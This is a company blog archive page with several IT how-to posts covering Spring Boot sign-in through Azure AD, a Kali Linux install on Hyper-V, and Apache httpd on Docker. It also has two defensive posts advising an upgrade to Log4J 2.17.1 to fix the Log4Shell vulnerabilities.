AttainIT Technologies Blog

Technology and Security

Sprint Boot Authentication with AzureAD Part 2

Spring Boot Authentication with Microsoft 365

In this second article of our series, we will start building a prototype that uses Spring Boot authentication to connect with Microsoft 365 Azure Active Directory (Azure AD). If you haven’t already completed part one of this series, please review that article now and create your Azure AD configuration.

Getting Started with Spring Initializr

In order to get the spring boot authentication prototype assembled quickly, first create an initial project structure using the Spring Initializr utility.

Spring Initializr, provided by the Pivotal, is a web application that will generate a Spring Boot project structure for you. Along with the structure, it provides a basic application class as well as either a Maven or a Gradle build script (we will use Gradle). The four primary Spring dependencies to import for our project include:

  • Azure Active Directory
  • OAUTH2 Client
  • Spring Web
  • Thymeleaf
Spring Initializr Settings
Spring Initializr Settings

Thymeleaf is a server-side Java templating engine for web applications. It has been around the block a few times, and does not have as much overhead as Angular so will keep our prototype example focused on authentication and easier to read.

Spring Initializr Project Structure

After making the dependency selections, click the “GENERATE” button to download the project file. As you can see from the snapshot below, Initializr has completed a fair amount of grunt work for our prototype.

Spring Boot Prototype Project Structure
Spring Boot Prototype Project Structure

Upgrading Versions in the Build Script

Spring Initializr choices can be a bit restrictive. At the time of this writing, the website only supports using version 2.5.8 while importing the Azure AD dependency. Selecting another version will give you the following error:

Spring Initializr Version Error for Azure AD
Spring Initializr Version Error for Azure AD

However, this is easily remedied by upgrading the versions in your build script after generating and downloading the project files.

Upgrade Spring Boot and Azure AD Versions
Upgrade Spring Boot and Azure AD Versions

We have upgraded both Spring Boot and Azure AD versions in the build.gradle script. Note that we have also upgraded the version of log4j to compensate for recent high profile vulnerabilities. Once Pivotal has upgraded the default log4j versions in Spring Boot, this log4j upgrade should no longer be necessary.

Sensitive Property Values

In part one of this series, we configured an Azure AD profile. During this step we created three values required for our prototype. These values should be treated as passwords. They should not be shared nor published to GitHub. Create the following file src/main/resources/


Spring Boot Authentication Prototype

Our prototype is now stubbed out and ready for implementation. Part 3 of this series will focus on the code changes necessary to authenticate with Microsoft 365.

Kali Hyper-V

How to Install Kali Linux on Hyper-V

This article documents the process of installing Kali Linux as a virtual machine running on a Windows 10 workstation using Hyper-V. The installation has numerous steps but most of them involve accepting default values. Rather than include all of the screenshots inline (which will become unwieldy), this article will be broken into several pages. An overview will be discussed and the full series of screenshots will be included as appendix pages.

What is Kali Linux

Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing.

Kali linux documentation

What is Hyper-V

Hyper-V is Microsoft’s hardware virtualization product. It lets you create and run a software version of a computer, called a virtual machine. Each virtual machine acts like a complete computer, running an operating system and programs. When you need computing resources, virtual machines give you more flexibility, help save time and money, and are a more efficient way to use hardware than just running one operating system on physical hardware.

microsoft hyper-v overview

Installation Overview

Installing Kali Linux on a Windows 10 workstation using Hyper-V involves the following steps:

  • Download the Kali Linux ISO image
  • Configure a new Hyper-V Virtual Machine
  • Install and Configure Kali Linux Operating System
  • Login to the Kali Linux VM

Downloading Kali Linux

Kali Linux is an open-source Linux distribution that has several installation options. For our purposes, we will be pulling the ISO image of the most recent stable build from the Kali Linux Download page.

There are several preconfigured virtual machines provided by Kali, but unfortunately Hyper-V is not one of them. We will instead select the recommended option for the “Bare Metal” installer.

download kali linux bare metal option
Download Kali Linux Bare Metal Option

Configure a new Hyper-V Virtual Machine

We assume you already have Hyper-V installed and running on your workstation. If not, please follow the Microsoft documentation for enabling the software.

Run the Hyper-V application, then right-click your workstation and select “New | Virtual Machine.”

create new hyper-v vm
Creating a new Hyper-V VM

You must complete several screens of options in order to configure the VM. Several steps worth noting include:

  • Assign Memory: change the default from 1024 to 2048
  • Connect Virtual Hard Disk: default is too large, 20GB is more than adequate for a starter Linux VM
  • Installation Options: configure to use the downloaded ISO image

There is a full listing of screenshots included in the Hyper-V Screenshot Appendix. After creating the VM by pressing Finish, you can begin the Kali Linux installation.

Install and Configure Kali Linux

Right-click on the newly created VM and select Connect:

connecting to a kali linux vm using hyper-v
Connecting to a Kali Linux VM using Hyper-V

There are almost two dozen configuration screens for the OS installation. Fortunately most of the steps can use default values. There is a full listing of screenshots included in the Kali Linux Screenshot Appendix. Fill out each configuration page and make sure to remember your username and password.

Login to the Kali Linux VM

After the last battery of questions, the VM will reboot itself and be ready for use with the login credentials you provided during setup.

Kali Linux Login Screen
Kali Linux Login Screen

Enter the username and password to login to the desktop:

Kali Linux Desktop
Kali Linux Desktop

Note that the initial user is an account with root user privileges. To verify this, open a terminal window and sudo up:

Kali Linux Root User
Kali Linux Root User

At this point your Kali Linux VM is complete. See the following pages for a complete listing of screenshots from the installation process. Note that you must be in the full-page mode for this article to see the additional pages.

apache http docker container

Getting Started with httpd on Docker

This article documents how to get started using Apache httpd on Docker. We will create a static website prototype using Windows 10. The website will start as a simple html page. We’ll then integrate the Bootstrap framework to allow us to easily include modern look and feel features. Finally, we will import Font Awesome to give the page some graphic icons.

If you work in IT, sooner or later you are going to find yourself needing to mock up a webpage or two. Maybe you have something to demonstrate to a customer. Or maybe your own website is a bit old and tired and needs a refresh (it happens to the best of us).

Many will follow the path of least resistance and try to get away with hacking a solution together using only a text editor and browser. This works for the most simple of cases, but it won’t take long before you need something a little more robust.

HTTP Server (httpd)

apache httpd web server
apache httpd web server

Apache has a tenured track record and is still the most popular open source web server on the internet. It offers everything you need to quickly get up and running.

Before containers, using a full featured web server on your workstation often came with a few headaches, not the least of which was installation. If you were building on Windows, you also needed to deal with the Control Panel and Firewall settings. Sometimes you already had a web server running and needed to deconflict ports. All of these problems disappear with the ability to quickly launch an isolated environment in a container.

Using Containers

docker logo
docker logo

Docker is a software platform for managing containers. It enables developers to bundle applications into containers—standardized executable artifacts combining source code with operating system libraries and dependencies required to run that code.

We are going to assume you already have it running on your workstation. If not, there is no shortage of tutorials available online. Once the software is installed, Docker Hub is used to locate the official Apache httpd image and start the prototpe.

Getting Started

We are running Windows 10 and using the Windows System for Linux (WSL2 Ubuntu) for our commands. The first step is to create a directory and use a text editor to create the most basic of web pages.

simple html webpage
simple html webpage

After saving our webpage, we will launch a container from the same directory with the following command:

docker run -dit --name my-apache-app -p 8080:80 -v "$PWD":/usr/local/apache2/htdocs/ httpd:2.4

The container launches in just a few seconds and is hosting our simple webpage on localhost port 8080.

docker commands to run httpd
docker commands to run httpd
hello world running in a container
Hello World webpage running in a container

Importing Vendor Frameworks

Next we will import two commonly used software frameworks for building our website prototype: Bootstrap and Font Awesome. First create a vendor directory, and then download and unpack the two frameworks. This will give you a directory structure as follows:

importing web frameworks
importing web frameworks

With the two frameworks installed, edit the original html page. We need to add the necessary links to the framework, as well as additional code to demonstrate the functionality.

updated webpage using bootstrap and font awesome
updated webpage using bootstrap and font awesome

After the file has been updated and saved, simply refresh the browser.

final webpage
final webpage example

Cleaning Up

The container will continue running until you stop it with the following command:

docker container stop my-apache-app

Once completely done, you can delete the container with this command:

docker container rm my-apache-app
Spring Boot Authenticate With AzureAD

Spring Boot Authentication with Microsoft 365

In this first article of a multipart series, we will configure Microsoft 365 Azure Active Directory (Azure AD) to support building a web application that uses Spring Boot authentication. The official Microsoft documentation highlights key concepts for this process but rushes through several steps. In later articles we will build an example oauth2 authenticated application which uses this Azure AD configuration.

Spring Boot Authentication Overview

A number of steps are needed to build an oauth2 Spring Boot user authentication example using Azure AD. However, before we can begin coding we need an active Microsoft 365 Business subscription which is configured to support our web application. Once Microsoft 365 is configured, we can use properties obtained from the portal to bootstrap our Spring Boot starters for oauth2 and Azure AD.

What is Microsoft 365

Formerly known as Office 365, this monthly subscription from Microsoft is ubiquitous in the business world. Most customers purchase it for the core office applications and email, but it also includes an often overlooked feature. Most business subscription plans also include a license for a basic version of Azure AD, Microsoft’s LDAP Directory solution.


For the purposes of this article, we’ll assume you have a typical small business setup. That means you already have a Microsoft 365 subscription, several user accounts, and have administrator access to the Microsoft portal.

Manage Azure AD

There are two primary ways to get to Azure AD via a web browser. You can either start at the top of the Microsoft portal and navigate your way through the maze, or just go directly to Once there, click on the button to view “Manage Azure Active Directory”

Manage Azure Active Directory
Manage Azure Active Directory

Register an Application in Azure AD

The first step in this configuration is to create a new application profile. Select “App Registrations” from the main menu in Azure AD and complete the form by adding a name, keeping the default options, and clicking the “Register” button.

Azure AD Register App
Azure AD Register App

The new application will be displayed with a number of system generated identifiers, as seen below.

Azure AD Application
Azure AD Application

These identifiers are sensitive, so treat them like passwords and keep them private. Two of these parameters will be needed for the Spring Boot authentication example application. Use the clipboard tooltip icon and make copies of the “Application (client) ID” and “Directory (tenant) ID” values and store them in a safe location for later.

Adding a Client Secret

Click the “New Client Secret” option from the “Certificates & Secrets” menu of your registered application.

Azure AD Add Client Secrets
Add Client Secrets

Add a “description” and select an “Expires” option from the form. Set the expiration length based on your company’s security policies and posture. Generally the shorter the expiry the better. But note that this value also greatly depends on your level of IT support staffing to determine how frequently the secret can be rotated and downstream applications updated.

Azure AD Client Secret Form
Add Client Secret Form

The generated client secret will contain several sensitive values that should be treated like passwords.

Azure AD Client Secret
Client Secret

Make a copy of the “Value” and store it in a safe location for later. You may also want to add the expiry date to an ops calendar so the rotation is not overlooked in the future.

Configure Platform Authentication

From the app registration, select the “Authentication” menu and then click “Add a platform“.

Azure AD Add Authentication Platform
Add Authentication Platform

Choose the “Web” option from the resulting “Configure platforms” form. Note that depending on your Microsoft 365 subscription level, you may see more platform options.

Azure AD Select Authentication Platform
Select Authentication Platform

Add a redirect URI to support local workstation development. You will need to choose a value that will not collide with any other routing within your system; The recommended default is seen below.

Azure AD Configure Authentication Platform
Configure Authentication Platform

The default “Redirect URI” can be copied below, and leave all other default values in place before clicking the “Configure” button.


Create Application Roles

Now that we have the oauth2 routing configured for the application, we need to create application roles. An application’s roles will vary greatly depending on its purpose. For our example, we will only create an administrator (super user) role. In a real application, you most likely will have several roles supporting various types of functionality.

Select the “App roles” menu from the app registration, then click “Create app role“.

Azure AD Add Application Role
Add Application Role

Provide the form values then click “Apply“.

Azure AD Add Administrator Role
Add Administrator Role

There is some discretion on how you name the roles. For this example, set the value (used in the code) in all caps and the other values in proper case.

Assign Users and Groups

Select “Enterprise applications” from the Azure AD portal menu. Next select your application from the list of “All applications“. Finally, select “Users and groups” and click “Add user/group“.

Azure AD Assign Users
Assign Users

Select a user in your organization, then add a role and click “Assign“. If you created several roles earlier, lather rinse repeat on this process.

Azure AD Add Assignment
Add Assignment

Note that your Microsoft 365 subscription level will determine what assignments you can make; Basic subscriptions will only allow you to assign users directly (no group assignments).

Spring Boot User Authentication Example

This completes the basic setup for Azure AD. In the next article, we will use the Spring Boot Initialzr to start a new Java project using Gradle.

log4j vulnerabilities in spring boot

Spring Boot Updates for Log4J Vulnerabilities

Hackers continue to scan and exploit systems containing Log4J vulnerabilities at an unprecedented rate. On 10 December, the Spring Blog published detailed instructions for remediating Spring Boot applications using Maven or Gradle build scripts; Where this solution pattern is still accurate, the documented version is now out-of-date. Remember that even though the library may not be explicitly imported, it still might be present as a transitive dependency.

Latest Release for Log4J Vulnerabilities

The most secure version of Log4J is now version 2.17.1 (documented in our previous article). To force Spring Boot to import the most recent release of Log4J, include the following in your build scripts:




ext['log4j2.version'] = '2.17.1'

Log4J Vulnerability Update (2.17.1)

Several weeks out from the initial zero-day event, the IT world continues to work through the remediation and blowback from the Apache Log4J vulnerability. First published as CVE-2021-44228 (Log4Shell) on 9 December 2021, subsequent CVEs continue to be issued as quick turnaround patches fail to completely resolve the problem. The most recent version is now 2.17.1 (released 28 December) which repairs a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832.

This family of vulnerabilities affects millions of computers, clouds, networks, and IoT devices ranging from the size of postage stamps to automobile chargers. It derives from the use of a ubiquitous piece of software, Log4J, which is mostly unknown to those outside of the IT industry. This open source code is used to generate files containing records of events that occur in software written in (or somehow leveraging) the Java programming language.

Hackers, in the form of independents or state actors, continue to scan the internet for vulnerabilities as IT teams race to resolve the problem. Once a vulnerable device is found, bad actors attempt to trigger a log message that includes a malicious payload which Log4J will process as a valid instruction. These exploits can open a reverse shell which allows the hacker to remotely control the targeted device.

As concerning as the exploit is itself, even more concerning is the pervasive use of Log4J leading this vulnerability to be described by the U.S. Cybersecurity & Infrastructure Security Agency (CISA) Director as one of the most serious she has seen in her career.

As of today, the remediation path involves upgrading impacted software to use the latest Log4J release, version 2.17.1 (note that versions of Log4J 1.x remain unaffected). The 2.17.1 release is available on the Apache site and has not yet migrated into the central repositories such as Maven Central.

CISA has published a response page which lists the history as well as recommended remediation paths for this exploit. Large vendors continue to release updates, including Amazon, IBM, and Google, but a significant concern also remains with smaller IT shops that do not have the workforce to quickly identify and push out updates.

If you have not already remediated systems that you are responsible for, it is long overdue that you do…

Page 2 of 2

Powered by WordPress & Theme by Anders Norén